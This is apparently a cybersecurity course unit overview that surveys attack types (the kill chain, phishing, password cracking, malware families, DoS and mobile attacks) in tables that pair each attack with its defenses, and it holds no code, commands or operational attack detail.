Unit II Overview: Attack Tools & Methods Landscape
Unit II surveys the practical toolkit of cyber attackers — the specific techniques, tools, and methodologies used to compromise systems and steal data. Understanding attacks from the attacker's perspective is fundamental to building effective defenses. This unit covers phishing, password attacks, keyloggers, malware families (viruses, Trojans, backdoors), steganography, and denial-of-service attacks.
---
The Attack Kill Chain
Before diving into individual tools, it helps to understand attacks within the Lockheed Martin Cyber Kill Chain — a model describing the stages of a targeted cyber attack:
| Phase | Name | Description | Attacker Actions | Detection Opportunities |
|---|---|---|---|---|
| 1 | Reconnaissance | Gathering information about target | OSINT, LinkedIn scraping, port scanning | Unusual queries, honeypots |
| 2 | Weaponization | Creating the attack payload | Building phishing email, packaging exploit | Threat intelligence feeds |
| 3 | Delivery | Delivering the weapon to target | Phishing email, malicious USB, watering hole | Email gateway, URL filtering |
| 4 | Exploitation | Triggering vulnerability | User clicks link, application exploit fires | AV, EDR, SIEM alerts |
| 5 | Installation | Installing persistent access | Trojan, backdoor, rootkit installation | EDR behavioral detection |
| 6 | C2 | Establishing command channel | Malware connects to C2 server | Network anomaly detection, DNS monitoring |
| 7 | Actions on Objective | Accomplishing attack goals | Data exfiltration, ransomware encryption | DLP, UEBA, threat hunting |
---
Attack Methods — Quick Comparison
| Attack Method | Primary Target | How It Works | Skill Required | Defense |
|---|---|---|---|---|
| Phishing | Human (user credentials) | Fake email/website tricks user | Low (kits available) | Email filtering, user training |
| Password Cracking | Authentication systems | Guessing or computing passwords | Low–Medium | Strong passwords, MFA, salting |
| Keylogger | User input (credentials, messages) | Records keystrokes | Low (commercial tools) | AV, behavioral monitoring |
| Virus | Files and programs | Attaches to executable files | Medium | AV, file integrity monitoring |
| Worm | Networks | Self-replicates across networks | Medium–High | Network segmentation, patching |
| Trojan Horse | User trust | Disguises malware as legitimate software | Medium | Code signing, sandboxing |
| Backdoor / RAT | System persistence | Hidden remote access channel | High | Network monitoring, EDR |
| Steganography | Data exfiltration, covert comms | Hides data inside innocent-looking files | Medium | Steganalysis tools |
| DoS / DDoS | Availability of services | Overwhelms target with traffic | Low–Medium (botnets) | Rate limiting, CDN, anycast |
---
Mobile/Cell Phone Attack Landscape
Modern attacks increasingly target mobile devices:
| Mobile Attack Type | Vector | Target | Example | Prevention |
|---|---|---|---|---|
| Smishing | SMS phishing | Credentials, OTP theft | Fake bank SMS with link | Don't click SMS links |
| Vishing | Voice call social engineering | Wire transfer authorization | "Microsoft Support" calls | Call verification, education |
| Malicious Apps | App stores (especially sideloading) | Full device compromise | Fake COVID apps with spyware | Official stores only, AV |
| SIM Swapping | Social engineering carrier | MFA bypass, account takeover | High-profile crypto thefts | FIDO2 hardware keys |
| Bluetooth Attacks | Bluejacking, Bluesnarfing | Data theft, spam | Airport Bluetooth attack | Disable Bluetooth in public |
| SS7 Protocol Attacks | Telecom network vulnerabilities | Call/SMS interception | Political surveillance | App-level encryption (Signal) |
| Wi-Fi Eavesdropping | Rogue access points, evil twin | Credential interception | Hotel Wi-Fi attack | Always use VPN |
---
Study Deep: The Modern Attack Ecosystem
- Cybercrime-as-a-Service (CaaS) democratizes attacks: Today, a criminal with no technical skills can purchase phishing kits ($50–200), RaaS access (20–30% of ransom), botnet rental, and DDoS-for-hire services on dark web forums. This has caused an explosion in attack frequency. The technical barrier is nearly zero.
- Dual-use tools dominate: The same tools used by attackers are used by defenders. Metasploit (penetration testing framework), Wireshark (network analyzer), Nmap (port scanner), Hashcat (password cracker) — all legitimate security tools misused by criminals. This creates legal complexity around tool possession.
- Living off the Land (LotL) attacks evade AV: Sophisticated attackers increasingly avoid custom malware that AV can detect. Instead they use native OS tools: PowerShell, WMI, scheduled tasks, PsExec. These "living off the land" techniques blend into normal system activity, making detection much harder.
- Phishing remains the #1 initial access vector: Despite being decades old, phishing is responsible for 91% of cyber attacks (PhishMe). This is not because phishing is technically sophisticated — it's because humans are naturally trusting and busy. The most sophisticated defense: FIDO2 hardware security keys that make phishing impossible for credential theft.
- Mobile has overtaken desktop as an attack surface: More than 50% of global web traffic is mobile. Attackers have adapted: mobile phishing via SMS (smishing), malicious apps on third-party stores, and exploitation of mobile OS vulnerabilities. Mobile endpoint protection (MDM/UEM) is now as critical as desktop AV.
Exam Tip: Unit II focuses on PRACTICAL attack methods. For each attack, know: (1) how it works mechanically, (2) what it targets, (3) real-world examples, (4) how to defend against it. The seven Cyber Kill Chain phases are important for understanding how attacks unfold sequentially and where defenses can be applied.